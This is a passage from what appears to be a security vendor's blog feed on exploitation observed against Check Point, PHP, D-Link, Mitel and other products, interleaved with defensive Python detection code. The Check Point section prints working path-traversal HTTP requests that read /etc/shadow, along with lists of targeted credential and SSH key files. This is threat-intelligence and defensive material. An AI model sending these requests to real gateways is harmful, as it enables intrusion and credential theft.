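2001:db8::1,suspicious
"""

# Constructed sample of the organization's own external ranges.
ORG_CIDRS = ["203.0.113.0/24", "192.0.2.128/25", "2001:db8::/32"]


def parse_observed(text):
    """Parse 'ip,classification' lines into {ip_address: classification}.

    Malformed addresses are skipped rather than aborting the whole audit;
    a missing classification is treated as 'unknown'.
    """
    observed = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        ip_str, _, cls = line.partition(",")
        try:
            ip = ipaddress.ip_address(ip_str.strip())
        except ValueError:
            continue
        observed[ip] = cls.strip().lower() or "unknown"
    return observed


def parse_networks(cidrs):
    """Turn CIDR strings into network objects; strict=False tolerates host bits."""
    return [ipaddress.ip_network(c.strip(), strict=False) for c in cidrs]


def find_matches(observed, cidrs):
    """Return sorted (ip, classification, cidr) for observed IPs in org ranges.

    Membership tests across IPv4/IPv6 simply return False, so mixed lists are
    safe; sorting is keyed on (version, address) because cross-version
    comparisons of address objects raise TypeError.
    """
    nets = parse_networks(cidrs)
    matches = []
    for ip, cls in observed.items():
        for net in nets:
            if ip in net:
                matches.append((ip, cls, net))
                break
    matches.sort(key=lambda m: (m[0].version, m[0]))
    return [(str(ip), cls, str(net)) for ip, cls, net in matches]


def summarize(matches):
    """Count matches per classification; every category needs follow-up."""
    return Counter(cls for _, cls, _ in matches)


def audit(text, cidrs):
    """Full audit: parse the list, match against CIDRs, return hits and totals."""
    matches = find_matches(parse_observed(text), cidrs)
    return matches, summarize(matches)


if __name__ == "__main__":
    found, counts = audit(OBSERVED_LIST, ORG_CIDRS)
    for ip, cls, net in found:
        print(f"{ip:<16} {cls:<10} in {net}")
    print("totals:", dict(counts))
```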

Firewall Admins & Vulnerability Managers

1. Patch and Secure Your Devices

  • Ensure all Fortinet devices are updated to address CVE-2022-40684 and other known vulnerabilities. Review configurations to close any unnecessary access points.

2. Block Compromised Fortinet IPs

  • Use GreyNoise to quickly block Fortinet IPs hitting our sensor network.

Take Action Now 

With GreyNoise, organizations can monitor their external-facing IPs, reduce noise in their threat landscape, and focus their defenses on the most immediate and significant risks. In the case of Fortinet firewalls, if it’s hitting GreyNoise sensors, it’s already up to no good. 

Take control of your external threat landscape today. Use GreyNoise to monitor malicious activity, track behaviors in real time, and protect your organization. Add your IPs or CIDRs to GreyNoise’s alerts now. 


From PoC to Attacker Interest in Hours: Real-Time Insights into Mitel MiCollab Vulnerabilities

Attackers are increasingly capitalizing on newly disclosed vulnerabilities within hours of proof-of-concept (PoC) code becoming public. This shrinking timeline leaves defenders with little time to react. A recent example is the rapid response to two Mitel MiCollab vulnerabilities — CVE-2024-41713 (authentication bypass) and CVE-2024-35286 (SQL injection). On December 5, GreyNoise was ready. The same day the PoC went public, GreyNoise began observing attacker activity, demonstrating the speed at which threat actors exploit new information. 

Timeline: From Disclosure to Observed Activity 

  • May 2024: CVE-2024-35286, the SQL injection vulnerability, is patched by Mitel. 
  • October 2024: CVE-2024-41713, an authentication bypass vulnerability, is disclosed. No PoC or large-scale visible activity is observed at this time. 
  • December 5, 2024: PoC code is publicly released for CVE-2024-41713, chaining it with another vulnerability. GreyNoise immediately deploys detection tags for both CVEs and begins observing attacker activity, including reconnaissance or exploitation, within hours. 

Seeing the Activity: Data from GreyNoise

The following screenshots from GreyNoise’s Visualizer show unique IP addresses associated with attacker activity following the PoC release. These spikes coincide with the deployment of detection tags, providing a clear picture of how quickly attackers respond to new exploit information. 

Leveraging our IP blocklists, GreyNoise customers can immediately block IPs targeting these vulnerabilities. 

CVE-2024-41713 (Authentication Bypass):

The chart below shows unique IP addresses probing for CVE-2024-41713 on December 5, immediately after the PoC release. This activity demonstrates attacker interest, highlighting how quickly attackers act on new exploit opportunities. For defenders, this means prioritizing visibility and mitigation immediately after public disclosures.  


CVE-2024-35286 (SQL Injection): 

While the SQL injection vulnerability showed limited activity, it’s important to monitor for potential escalation. Even low activity levels can indicate attackers testing the waters, making proactive mitigation essential. 

Addressing the Threat: Patches Are Available 

Both vulnerabilities have been addressed by Mitel: 

  • CVE-2024-35286: Mitel released a patch in May 2024. Organizations should apply this fix immediately to mitigate risk. 
  • CVE-2024-41713: Mitel resolved this issue in MiCollab version 9.6, released in October 2024. Upgrading to this version or later is essential. 

By applying these patches, organizations can reduce their exposure to attacker activity. 

The Value of Real-Time Intelligence 

The divergence between predicted exploit likelihood and real-world attacker behavior highlights the necessity for real-time threat intelligence. Predictive models like EPSS currently list both CVEs at 0% likelihood of exploitation, yet GreyNoise’s data provides concrete evidence of attacker activity. This underscores a critical reality: attackers act on opportunities as soon as they arise, often outpacing static predictions. 

With GreyNoise, defenders can: 

  • Gain Immediate Visibility: Real-time data shows attacker activity targeting vulnerabilities as it happens.
  • Prioritize Effectively: Knowing where attackers are focusing their efforts helps defenders allocate resources wisely. 
  • Preempt Escalation: Use GreyNoise blocklists and intelligence feeds to disrupt attacker workflows before reconnaissance escalates into exploitation. 

Recommendations for Defenders

Organizations leveraging Mitel MiCollab should act quickly: 

  1. Apply Available Patches: Ensure that fixes for both CVEs are implemented without delay. 
  2. Leverage Real-Time Monitoring: Use platforms like GreyNoise to stay informed about attacker activity targeting your infrastructure.
  3. Adopt Layered Defenses: Implement network segmentation, access controls, and continuous monitoring to reduce exposure and contain potential breaches. 
  4. Proactively Block Malicious IPs: Leverage real-time intelligence to identify threat actor IPs and dynamically block them.

Staying Ahead of the Curve

The Mitel MiCollab vulnerabilities demonstrate the importance of rapid response in cybersecurity. While defenders cannot always predict when attackers will act, real-time visibility ensures they can respond effectively to reconnaissance or exploitation efforts as they emerge. GreyNoise’s ability to deploy detection tags on the same day as the PoC release exemplifies its commitment to staying ahead of attackers. This readiness is crucial in a world where the window between disclosure and active attacker activity continues to shrink. By detecting reconnaissance or exploitation efforts within hours, GreyNoise gives defenders the critical lead time needed to respond effectively. 

The insights in this blog were made possible by GreyNoise’s Global Observation Grid, a network of internet-facing, primary sensors that passively observe and analyze global attack traffic. GreyNoise recently announced significant enhancements to its sensor and data pipeline technology that deliver deeper insights and broader coverage into cyber threats, equipping security teams with actionable intelligence to better detect, prioritize, and respond to emerging and resurgent threats.

Stay ahead of emerging threats with GreyNoise’s real-time intelligence. Contact us today to learn how we can help protect your organization from evolving vulnerabilities.

Perma-Vuln: D-Link DIR-859, CVE-2024-0769

Discover the latest findings from GreyNoise Labs as we delve into a perma-vuln plaguing the D-Link DIR-859 router. In our newest blog post, "Perma-Vuln: D-Link DIR-859, CVE-2024-0769," we uncover the intricacies of CVE-2024-0769, a path traversal vulnerability affecting D-Link DIR-859 WiFi routers, leading to information disclosure.

The exploit's variations, including one observed in the wild by GreyNoise, enable the extraction of account details from the device. The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability.

Click here to see the details and interesting payload that Sift has identified.

SolarWinds Serv-U (CVE-2024-28995) exploitation: We see you!

On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.

What did they discover?

They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.

But, that's not all!

They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).

Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.

What's Going on with CVE-2024-4577 (Critical RCE in PHP)?

Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, the flaw stems from Windows' 'best-fit' character mapping, which lets attackers inject command-line arguments into the PHP CGI binary via crafted HTTP requests.

Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.
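To make the argument-injection mechanism concrete, here is an added Python example (not GreyNoise's, DEVCORE's or watchTowr's code) that reconstructs what a CGI binary would see on its command line after best-fit mapping and flags query strings that smuggle an option. It models only one best-fit substitution, byte 0xAD (soft hyphen) becoming an ASCII hyphen, and assumes the web server follows the CGI "indexed query" convention for php-cgi; the sample query strings are constructed, not observed traffic.

```python
from urllib.parse import unquote_to_bytes

# Added example, not GreyNoise's or PHP's code. It models one best-fit mapping only:
# under Windows code pages that apply "best-fit" substitution, byte 0xAD
# (U+00AD SOFT HYPHEN) is turned into the ASCII hyphen-minus that option parsers
# understand. Every other byte is passed through as Latin-1 (assumption).
SOFT_HYPHEN = 0xAD


def best_fit(raw: bytes) -> str:
    """Decode bytes as a best-fit code page would: 0xAD -> '-', others unchanged."""
    return "".join("-" if b == SOFT_HYPHEN else chr(b) for b in raw)


def cgi_argv(query: str) -> list:
    """Reconstruct what a CGI binary receives on its command line.

    Under the CGI 'indexed query' convention (RFC 3875 section 4.4), a query
    string that contains no raw '=' is split on '+', percent-decoded and handed
    to the program as arguments. Assumption: the server does this for php-cgi.
    """
    if not query or "=" in query:
        return []
    return [best_fit(unquote_to_bytes(part)) for part in query.split("+")]


def injected_options(query: str) -> list:
    """Arguments php-cgi would parse as options once best-fit mapping has run."""
    return [arg for arg in cgi_argv(query) if arg.startswith("-")]


def is_suspicious(query: str) -> bool:
    """True when the query smuggles an option. A literal leading '-' is caught
    too, but the soft-hyphen form is the one a naive search for '-d' misses."""
    return bool(injected_options(query))


# Constructed sample query strings (not observed traffic) with expected verdicts.
SAMPLES = {
    "page=about": False,                 # ordinary query: raw '=' means no argv at all
    "foo+bar": False,                    # indexed query, but nothing looks like an option
    "%ADd+display_errors%3d1": True,     # 0xAD 'd' becomes '-d', '%3d' hides the '='
    "%ADs": True,                        # becomes '-s'
}

if __name__ == "__main__":
    for q, expected in SAMPLES.items():
        print(f"{q:28} argv={cgi_argv(q)!r:36} suspicious={is_suspicious(q)} (expected {expected})")
```

The practical point is that a request log filter must percent-decode and apply the best-fit mapping before looking for option-shaped arguments; matching on the literal string "-d" in the raw query string finds nothing.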

Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.

What’s Going on With Check Point (CVE-2024-24919)?

On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."

Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:

Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).

On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.

On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.

The vulnerability

The core vulnerability is a pretty straight-forward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.

Our observations

Sift

Although we tagged this issue very quickly, the first exploit attempt we saw hitting Sift (on May 30, 2024) used a non-working payload, so it really was only an attempt - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

/clients/MyCRL/../../../..//etc/shadow

We started seeing actual exploitation attempts logged in Sift on May 31, 2024:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Connection: close
Accept-Encoding: gzip
Connection: close
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

aCSHELL/../../../../../../../etc/shadow

I’m always impressed when an automated system can catch a novel exploit without being told about it!

Honeypot data

We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38

/clients/MyCRL/../../../..//etc/passwd

The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?

In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.

The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for Cisco ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Content-Length: 39
Accept-Encoding: gzip

aCSHELL/../../../../../../../etc/shadow

Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.

That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:

4805 ../../../../../../../etc/fstab
2453 ../../../../../../../etc/shadow
980 ../../../../../../../sysimg/CPwrapper/SU/Products.conf
959 ../../../../../../../config/db/initial
508 ../../../../../../../etc/passwd
202 ../../../../../../../home/*/.ssh/authorized_keys
166 ../../../../../../../opt/checkpoint/conf/
165 ../../../../../../../etc/ssh/sshd_config
163 ../../../../../../../etc/vpn/vpn.conf
161 ../../../../../../../home/*/.ssh/id_rsa

It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):

1615 ../../../../../../../etc/fstab
491 ../../../../../../../etc/passwd
486 ../../../../../../../etc/shadow
197 ../../../../../../../home/*/.ssh/authorized_keys
161 ../../../../../../../opt/checkpoint/conf/
160 ../../../../../../../etc/ssh/sshd_config
158 ../../../../../../../etc/vpn/vpn.conf
156 ../../../../../../../home/*/.ssh/id_rsa
94 ../../../../../../../home/*/.ssh/known_hosts
83 ../../../../../../../home/root/.ssh/authorized_keys

As you can see, /etc/fstab remains a popular target - probably it’s a reliable path being used by some off-the-shelf scanner(s).

/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull /sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!
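Classifying and tallying these payloads is mechanical, so here is an added Python example (not GreyNoise's Sift or honeypot tooling) that does it over a few constructed request captures shaped like the ones quoted above. It assumes that the aCSHELL/ prefix followed by ../ segments, the shape of the working PoC, marks a "plausibly working" payload and that other traversal bodies are malformed attempts, since the post does not say exactly why the other forms fail; resolving the traversal from the filesystem root is also an assumption about the server.

```python
import posixpath
import re
from collections import Counter
from typing import Optional

# Constructed request captures shaped like those quoted above (not real sensor data).
SAMPLE_REQUESTS = [
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 198.51.100.7\r\nContent-Length: 39\r\n\r\n"
    "aCSHELL/../../../../../../../etc/shadow",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 198.51.100.7\r\nContent-Length: 38\r\n\r\n"
    "/clients/MyCRL/../../../..//etc/shadow",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 198.51.100.7\r\nContent-Length: 38\r\n\r\n"
    "aCSHELL/../../../../../../../etc/fstab",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 198.51.100.7\r\nContent-Length: 38\r\n\r\n"
    "aCSHELL/../../../../../../../etc/fstab",
    "GET /clients/MyCRL HTTP/1.1\r\nHost: 198.51.100.7\r\n\r\n",
]

TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
# Assumption: the prefix-plus-traversal shape of the working PoC marks a plausibly
# working payload; the post does not explain why the other body shapes fail.
WORKING_SHAPE = re.compile(r"^aCSHELL/(?:\.\./)+")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    return method, path, body


def resolved_target(body: str) -> Optional[str]:
    """Collapse the ../ segments to the absolute file the payload reaches for.

    Anchoring at '/' assumes the server resolves the path from the filesystem
    root, which is what lets 'too many' ../ segments still land on /etc/shadow.
    """
    if not TRAVERSAL.search(body):
        return None
    return posixpath.normpath("/" + body.lstrip("/"))


def classify(raw: str) -> dict:
    """Label one request as benign, a malformed attempt, or plausibly working."""
    method, path, body = parse_request(raw)
    target = resolved_target(body)
    if method != "POST" or path != "/clients/MyCRL" or target is None:
        verdict = "benign"
    elif WORKING_SHAPE.match(body):
        verdict = "plausibly-working"
    else:
        verdict = "malformed-attempt"
    return {"verdict": verdict, "target": target}


def tally(requests) -> Counter:
    """Count plausibly-working payloads per resolved target, like the lists above."""
    counts = Counter()
    for raw in requests:
        result = classify(raw)
        if result["verdict"] == "plausibly-working":
            counts[result["target"]] += 1
    return counts


if __name__ == "__main__":
    for target, n in tally(SAMPLE_REQUESTS).most_common():
        print(n, target)
```

Counting by the resolved target rather than the literal body is what makes variants with different numbers of ../ segments, or a stray double slash, fall into the same bucket.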

Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)

Conclusion

With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!

GreyNoise Tags Its Way to 1337 Elite Status

Yesterday, GreyNoise reached a fun and significant milestone after publishing our 1,337th tag. 1337 is a cherished number in hacker culture, as it is a numerical shorthand for "leet", which itself stands for "elite". This term has deep roots, going all the way back to the '80s when one had to make modems scream to access bulletin board systems (now, we humans are the ones screaming whenever we go online to see what fresh hades awaits us each day).

What makes this milestone even more significant is how it was achieved.

The chart, below, shows the cumulative sum of tag counts by year. While there was a modest improvement in intra-year tag creation from 2022 to 2023, we're just into the first few weeks of Q2 in 2024 and are almost at the total tag count for 2023.

We will almost certainly blow past 2023's tag count well-before the end of Q2, and this has all been made possible by our focused and practical use of AI. This system helps our incredible detection engineers quickly triage the millions of events our sensor fleet absorbs every day. With it, they discover and tag novel payloads to help inform and protect our customers, community, and the internet as a whole. The application that fuels this work is called Sift, and we've waxed poetic about it quite a bit over the past few months.

This boost to the tag inventory has also meant an increase in CVE coverage.

(Since it most likely drew your attention, the jumps in 2022 were due to numerous factors, including the increase in Russian hostilities towards Ukraine.)

60% of 2024 tags are based on CVEs, and — along with plenty of "modern" vulnerabilities — Sift has helped us catch exploitation attempts of some very old CVEs, too:

I'm incredibly proud of our team of data scientists, security researchers, and detection engineers. Their leet expertise powers the detections that folks rely on every day, and we hope you'll join in our celebration of achieving this epic milestone!

To learn more about GreyNoise tags and how they differ from "traditional" detections, check out our Tags Webinar Series.

CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS

On April 12th, 2024, Palo Alto Networks announced CVE-2024-3400, a CVSS 10 critical vulnerability in PAN-OS software versions 10.2, 11.0, and 11.1. It is an arbitrary file-write flaw that enables unauthenticated attackers to execute arbitrary Linux commands with root-level privileges on affected firewalls, provided the firewall is configured with a GlobalProtect gateway or portal (or both) and has device telemetry enabled.

Palo Alto Networks and Unit 42 have confirmed that threat actors have exploited CVE-2024-3400 in a limited number of attacks in the wild. CISA published guidance and added it to the Known Exploited Vulnerabilities (KEV) catalog on Friday, April 12, 2024.

Palo Alto Networks released workaround guidance and some hotfixes on April 14, 2024. Customers can also mitigate the vulnerability by enabling Threat ID 95187 if they have a Threat Prevention subscription, or by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version.

GreyNoise is tracking opportunistic exploitation attempts here. As of April 15, 2024, 17:00 UTC, no attempts have been observed by our fleet.

Of note: our sensor fleet has detected instances of non-working exploits that have been circulated online, claiming to be for CVE-2024-3400. This indicates that opportunistic exploitation will quickly follow once working exploit code is released.

CVE-2024-3273: D-Link NAS RCE Exploited in the Wild

A remote code execution vulnerability in D-Link NAS devices is actively being exploited and is tracked under CVE-2024-3273. The vulnerability is believed to affect as many as 92,000 devices and further information can be found on D-Link’s support announcement.

(04/11/2024): Clarification on CVE-2024-3273 & CVE-2024-3272

Exploitation of the CVE-2024-3273 command injection vulnerability requires valid `user=` and `passwd=` parameters. A companion vulnerability, CVE-2024-3272, describes the issue as "manipulation of the argument user with the input messagebus leads to hard-coded credentials". It is important to note that the "credentials" as described are only the username, "messagebus".

"messagebus" is not a backdoor account. It is one of many common pre-configured Linux system users that functionally cannot log in and therefore have no password. Other common system users include avahi, syslog, nobody, ntp, rtkit, and whoopsie. D-Link correctly validates that the username exists and correctly validates that the provided password matches. The logic flaw exercised by CVE-2024-3273 is that once the empty (and therefore "correct") password for "messagebus" matches, nothing ever checks whether that account should be able to log in with a password at all.
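The flaw is easier to see side by side with a fixed version, so here is an added Python example (not D-Link's firmware code) of the two-check login the paragraph describes next to a hardened one. The account tables are constructed to resemble /etc/passwd and /etc/shadow, the password "hashes" are unsalted SHA-256 purely for the example, and the admin allowlist in the hardened check is an assumption about how a device web UI should be gated.

```python
import hashlib
import hmac
from typing import Optional

# Added example, not D-Link's code. Constructed account tables shaped like
# /etc/passwd and /etc/shadow; real systems use crypt(3) hashes, not bare SHA-256.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

PASSWD = {  # user -> (uid, login shell)
    "admin": (0, "/bin/sh"),
    "messagebus": (103, "/usr/sbin/nologin"),   # system account, never interactive
    "nobody": (65534, "/usr/sbin/nologin"),
}
SHADOW = {  # user -> stored password field
    "admin": hashlib.sha256(b"hunter2").hexdigest(),
    "messagebus": "",   # empty field: no password was ever set
    "nobody": "*",      # locked: nothing can hash to this
}


def _hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def _password_matches(stored: str, supplied: str) -> bool:
    """Compare a submitted password with the stored field.

    An empty stored field 'matches' an empty submission. That comparison is
    technically correct, which is exactly why it is not enough on its own.
    """
    if stored == "":
        return supplied == ""
    return hmac.compare_digest(stored, _hash(supplied))


def vulnerable_login(user: str, passwd: str) -> bool:
    """The flawed check as described: the user must exist and the password must
    match. Whether the account may log in at all is never asked."""
    if user not in PASSWD:
        return False
    return _password_matches(SHADOW[user], passwd)


def hardened_login(user: str, passwd: str, allowed: Optional[set] = None) -> bool:
    """Same two checks plus: the account must be on the web UI's allowlist
    (assumption), must be interactive, must carry a real password, and the
    submitted credential must not be empty."""
    allowed = allowed if allowed is not None else {"admin"}
    if user not in PASSWD or user not in allowed:
        return False
    _, shell = PASSWD[user]
    stored = SHADOW[user]
    if shell in NOLOGIN_SHELLS:                        # messagebus, nobody, ...
        return False
    if stored == "" or stored.startswith(("*", "!")):  # no password, or locked
        return False
    if passwd == "":                                   # never accept an empty credential
        return False
    return _password_matches(stored, passwd)


if __name__ == "__main__":
    for user, pw in [("messagebus", ""), ("admin", "hunter2"), ("admin", "wrong"), ("nobody", "")]:
        print(f"{user:11} vulnerable={vulnerable_login(user, pw)!s:5} hardened={hardened_login(user, pw)}")
```

The distinction worth carrying into code review: "the password is correct" and "this principal is permitted to authenticate here" are separate questions, and a login path that only asks the first one will eventually meet an account whose correct password is no password.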

(04/09/2024): Update on number of vulnerable devices

Upon further analysis, it appears the number of vulnerable devices is much lower than initially reported. According to our friends at Censys, the number is closer to 5,500 devices.

GreyNoise quickly released a tag for tracking under D-Link NAS CVE-2024-3273 RCE Attempt, which was relatively easy for us because our Sift tooling surfaced the exploit to us automatically. Sift curates a report of new/interesting traffic observed by GreyNoise sensors daily after doing much of the analysis and triage work itself.

You can read more about Sift.

Sift’s analysis above is correct! Taking it a step further, the command the above IP is attempting to execute is a generic shell script pattern used by botnet operators to try to execute malware for every possible CPU architecture in the expectation that at least one will work. The malware is fetched from 38[.]6[.]224[.]248 over HTTP.

We have retrieved the sample skid.x86 and uploaded it to VirusTotal for sharing and further analysis:

Where are they now? Starring: Atlassian's Confluence CVE-2023-22527

Ever wonder what happens to vulnerabilities after they're forgotten? 

In a new blog from the GreyNoise Labs team, we look at CVE-2023-22527, an Atlassian Confluence vulnerability that was all over the news back in January 2024, then forgotten a week later. But even though the media has forgotten, attackers haven't!

The Labs team digs a little into who the attacker is and their techniques - killing other malware, deleting log files, and even using SSH keys to infect other hosts.

If you're interested in how attackers use old vulnerabilities and what they do once they're on a host, check it out.

Battling Ransomware One Tag At A Time

In October 2023 — as part of the Ransomware Vulnerability Warning Pilot (RVWP) — CISA began tagging entries in their Known Exploited Vulnerabilities (KEV) catalog. This field designates whether exploits for a given vulnerability are known to be used in ransomware attacks. Ransomware has disrupted critical services, businesses, and communities worldwide, and many organizations are working diligently to get ahead of these attacks to prevent losses, disruptions, and exposures.

We’ve talked about this topic before, but today we dig a bit deeper into the topic with some specific guidance as to how your organization can fight the good fight against these foes by leveraging the power of GreyNoise tags.

GreyNoise Tags vs. Ransomware

As scores of organizations that use them know, GreyNoise tags are a signature-based detection method that categorizes internet noise into actionable intelligence. As of this writing, we’ve observed recent activity in 63 tags that CISA has identified as being used in association with ransomware attacks. The figure at the beginning of this post shows the frequency and volume of this opportunistic activity. One striking feature of this activity is the diversity of targeted platforms.

In the case of internet-facing attack campaigns, one might assume that vulnerabilities targeted by ransomware actors would lean towards remote access technologies. The chart, and the data that backs it up, shows that almost no technology category is safe from these types of attacks. Collaboration tools, such as Atlassian Confluence or JetBrains TeamCity; email platforms, such as Microsoft Exchange; software that powers application middleware services, such as JBoss and WebLogic; and even devices that are intended to help elevate safety and resilience, such as SonicWall, Ivanti, Citrix, and Fortinet, are all regularly targeted.

If you use any of these technologies, knowing when new activity is seen can be helpful in shoring up defenses and readying response activities. GreyNoise platform features such as Alerts and block lists let security teams, respectively, decide when key systems deserve closer monitoring and prevent opportunistic harm outright. With the noise weeded out, response teams can focus on similar activity that is likely to be more targeted, and therefore possibly the work of more capable adversaries. And, because we integrate with a host of other security tools, teams can save time and use our intelligence within familiar environments.

The Long, Sporadic Tail Of Ransomware Tag Activity

Another striking feature of our ransomware tag activity chart is the diversity of activity. Cloud deployments top the list, with attackers looking to take advantage of misconfigurations that may arise in these highly dynamic environments. Broad and commonly deployed technologies are also regular targets, since these systems can also become victims of errant misconfigurations, especially when restored from unpatched backups.

However, as we move down the list, the frequency becomes far more sporadic, and many involve only single hosts vs. botnet armies. This can be due to attacker familiarity, or individual actors keying off results from well-timed Censys or Shodan searches that show newly exposed vulnerable configurations. If your organization uses any of these components, there truly is no rest from vigilance.

The Ransomware GNQL Listicle

To help defenders get a leg up on these attacks, the list below has links to each individual tag that’s known to be used in ransomware attacks. At each tag page, you can find the block list URL which you can use to immediately weed out the opportunistic noise. Wrap one or more of them inside a GNQL query, such as tags:"F5 BIG-IP iControl RCE Attempt", and you can set up an alert to notify you when new activity is seen, especially in generally dormant tags.

Find Out More

If you're curious as to just how GreyNoise researchers craft our tags we have a three-part webinar series that discusses the makeup of our tags, walks you through how we discover what needs to be tagged, and illustrates how AI is empowering the creation of new tags and detections:

Not a GreyNoise customer — yet? See how much time GreyNoise may be able to save your organization, and how many hours your defenders can save with our ROI calculator.

Sign up and take our platform for a free enterprise trial to see all the features and data available.

CVE-2022-1471: SnakeYAML Deserialization Deep Dive

SnakeYAML has slithered its way into a deserialization vulnerability, with versions before 2.0 allowing remote code execution when used to parse untrusted input. In this GreyNoise Labs post, Lead Security Researcher Ron Bowes digs into the technical details, drama, and exploits around CVE-2022-1471.  

By default, SnakeYAML allows the instantiation of arbitrary Java classes from untrusted YAML sources. This "insecure by default" design has led to at least eight different vulnerabilities prior to its official designation as a CVE. We'll highlight the unhelpful responses from developers and the importance of secure defaults.

Additionally, we'll demonstrate how to build a vulnerable app and understand how the deserialization actually works, developing an exploit to demonstrate how to achieve remote code execution.

C'mon down for an in-depth look at this critical YAML vulnerability!
